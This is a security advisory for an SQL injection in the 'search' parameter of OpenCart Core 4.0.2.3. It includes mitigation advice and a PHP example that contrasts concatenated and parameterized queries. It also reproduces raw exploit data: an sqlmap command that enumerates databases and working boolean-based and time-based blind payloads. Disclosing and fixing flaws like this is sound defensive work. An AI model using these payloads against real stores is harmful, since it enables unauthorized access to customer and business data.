Vendor: OpenCart Core
By: Saud Alenazi
CVSS: 6.1 (HIGH)
CWE: 89 (SQL Injection)
Product Name: OpenCart Core
Affected Version From: 4.0.2.3
Affected Version To: 4.0.2.3
Patch Exists: NO
Related CWE:
CPE: a:opencart:opencart:4.0.2.3
Metasploit:
Other Scripts:
Platforms Tested: XAMPP, Linux
2024

OpenCart Core 4.0.2.3 – ‘search’ SQL Injection

OpenCart Core 4.0.2.3 is vulnerable to SQL Injection through the 'search' parameter in the URL /index.php?route=product/search&search=. Exploiting this vulnerability can lead to a potential compromise of the application, unauthorized access or modification of data, and exploitation of hidden database vulnerabilities.

Mitigation:

To mitigate this vulnerability, input validation and sanitization should be implemented so that the value of the 'search' parameter cannot alter the SQL query. Additionally, using parameterized queries can help prevent SQL Injection attacks.
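
The parameterized-query mitigation described above, as an added example that is not code from OpenCart or from the advisory: it runs the boolean-based payload quoted in the sqlmap output against a concatenated query and against a bound one. The in-memory SQLite table, the column names, the query shape and the function names are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Constructed catalogue in an in-memory SQLite database (needs the pdo_sqlite extension).
// Table, columns and query shape are assumptions for illustration, not OpenCart's schema.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE product (product_id INTEGER PRIMARY KEY, name TEXT, status INTEGER)');
    $pdo->exec("INSERT INTO product (name, status) VALUES ('Red Lamp', 1), ('Blue Chair', 1), ('Green Desk', 1)");
    return $pdo;
}

// BEFORE: the request value is concatenated into the SQL text, so quotes and
// parentheses in it become part of the statement.
function search_concat(PDO $pdo, string $search): array
{
    $sql = "SELECT name FROM product WHERE status = 1 AND (name LIKE '%" . $search . "%')";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// AFTER: the SQL text is constant and the value travels as a bound parameter.
// LIKE wildcards in the value are escaped so they match literally.
function search_bound(PDO $pdo, string $search): array
{
    $escaped = strtr($search, ['!' => '!!', '%' => '!%', '_' => '!_']);
    $stmt = $pdo->prepare("SELECT name FROM product WHERE status = 1 AND (name LIKE :pattern ESCAPE '!')");
    $stmt->execute([':pattern' => '%' . $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = demo_db();
$inputs = [
    'ordinary term'         => 'Lamp',
    'payload from the page' => "') AND 2427=2427-- drCa",
    'literal percent sign'  => '%',
];
foreach ($inputs as $label => $value) {
    printf(
        "%-22s concat=%d row(s)  bound=%d row(s)\n",
        $label,
        count(search_concat($pdo, $value)),
        count(search_bound($pdo, $value))
    );
}
```

With the payload from the page, the concatenated query returns every row in the table, while the bound query treats the same bytes as a product name and matches nothing.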

Exploit-DB raw data:

# Exploit Title: OpenCart Core 4.0.2.3 - 'search' SQLi
# Date: 2024-04-2
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.opencart.com/
# Software Link: https://github.com/opencart/opencart/releases
# Version: 4.0.2.3
# Tested on: XAMPP, Linux
# Contact: https://twitter.com/dmaral3noz
* Description :
OpenCart allows SQL Injection via parameter 'search' in /index.php?route=product/search&search=.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
* Steps to Reproduce :
- Go to : http://127.0.0.1/index.php?route=product/search&search=test
- Now use the sqlmap command : sqlmap -u "http://127.0.0.1/index.php?route=product/search&search=#1" --level=5 --risk=3 -p search --dbs
===========
Output :
Parameter: search (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: route=product/search&search=') AND 2427=2427-- drCa
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: route=product/search&search=') AND (SELECT 8368 FROM (SELECT(SLEEP(5)))uUDJ)-- Nabb